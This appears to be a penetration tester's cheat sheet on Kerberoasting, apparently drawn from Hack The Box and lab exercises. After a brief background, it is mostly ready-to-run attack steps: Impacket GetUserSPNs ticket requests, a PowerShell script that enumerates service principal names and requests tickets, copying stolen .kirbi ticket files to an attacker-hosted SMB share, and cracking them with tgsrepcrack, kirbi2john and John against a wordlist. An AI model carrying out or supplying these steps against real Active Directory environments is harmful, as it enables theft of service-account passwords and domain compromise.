kerberoasting
- (Step 1) - identify SPN for Services
- (Step 2) - generate Service Ticket for SPN
- (Step 3) - extract Service Ticket form memory
- (Step 4) - transfer .kirbi file to kali
- (Step 5) - crack Service Ticket to get plain text password
Background
Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.
When you want to authenticate to some service using Kerberos, you contact the DC and tell it to which system service you want to authenticate. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with it’s password, check who you are, and decide it if wants to let you in.
In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service.
Most of the time you will need an active account on the domain in order to initial Kerberoast, but if the DC is configured with UserAccountControl setting “Do not require Kerberos preauthentication” enabled, it is possible to request and receive a ticket to crack without a valid account on the domain.
version 1
Get Hash Use the GetUserSPNs.py script from Impacket to get a list of service usernames which are associated with normal user accounts. It will also get a ticket that I can crack.
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
|->
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2018-07-21 11:05:53
root@kali:~/hackthebox/active-10.10.10.100# cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f3760xxxxx......
version 2
list SPN
list SPN$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name
$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$seracher.SearchRoot = $objDomain
$seracher.filter = "serviceprincipalname=*"
$items = $seracher.FindAll()
Write-Host "-------------------------"
Foreach($obj in $items) {
Foreach($prop in $obj.Properties) {
Write-Host "Display Name:" $prop.displayname
Write-Host "Serviceprincipal Name:" $prop.serviceprincipalname
}
Write-Host "-------------------------"
}
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSQL/CorpSqlServer.corp.com'
klist
# on kali
/opt/tools/impacket/examples/smbserver.py public .
# on windows
copy '0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi' \\192.168.111.222\public\
sudo apt install -y kerberoast
python3 /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
/opt/tools/kerberoast/kirbi2john.py 0-00000000-user@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Ref
- https://github.com/nidem/kerberoast
- https://0xdf.gitlab.io/2018/12/08/htb-active.html